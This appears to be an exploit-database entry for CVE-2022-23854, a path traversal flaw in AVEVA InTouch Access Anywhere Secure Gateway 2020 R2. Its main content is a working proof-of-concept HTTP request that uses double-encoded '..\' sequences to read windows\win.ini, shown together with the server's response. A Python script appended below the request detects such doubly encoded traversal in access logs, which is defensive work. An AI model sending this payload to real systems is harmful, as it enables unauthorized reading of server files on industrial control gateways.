NeoSense

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal

Author: Jens Regel
type: remote
platform: hardware
date_added: 2022-11-11 
date_updated: 2022-11-11 
verified: 0 
codes: CVE-2022-23854 

Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older

Proof of Concept:
GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
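
Detection sketch for the request shape above, as an added example that is not part of the original advisory: the PoC path is percent-encoded twice (%252e decodes to %2e and then to ".", %255c to %5c and then to "\"), so a filter that decodes only once never sees "..\". The access-log format, the sample lines and all names in the code are constructed assumptions, and the log is assumed to record the raw request target.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed combined-style format, not real data).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2022:10:00:01 +0000] "GET /AccessAnywhere/start.html HTTP/1.1" 200 5120',
    '10.0.0.9 - - [11/Nov/2022:10:00:07 +0000] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 200 92',
    '10.0.0.9 - - [11/Nov/2022:10:00:09 +0000] "GET /AccessAnywhere/%2e%2e/%2e%2e/x HTTP/1.1" 404 0',
    '10.0.0.7 - - [11/Nov/2022:10:00:12 +0000] "GET /AccessAnywhere/resources/app%2520icon.png HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A ".." path segment delimited by either slash style, checked after full decoding.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
MAX_ROUNDS = 5  # bound the loop so deeply nested encodings cannot stall the scan


def fully_decode(target):
    """Percent-decode until the string stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds


def scan(lines):
    """Return one finding per request whose fully decoded path contains '..'."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]  # inspect the path, not the query
        decoded, rounds = fully_decode(path)
        if TRAVERSAL_RE.search(decoded):
            findings.append({
                "target": m.group("target"),
                "decoded": decoded,
                "decode_rounds": rounds,  # 2 or more means nested encoding
                "status": int(m.group("status")),  # 200 suggests a file was served
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```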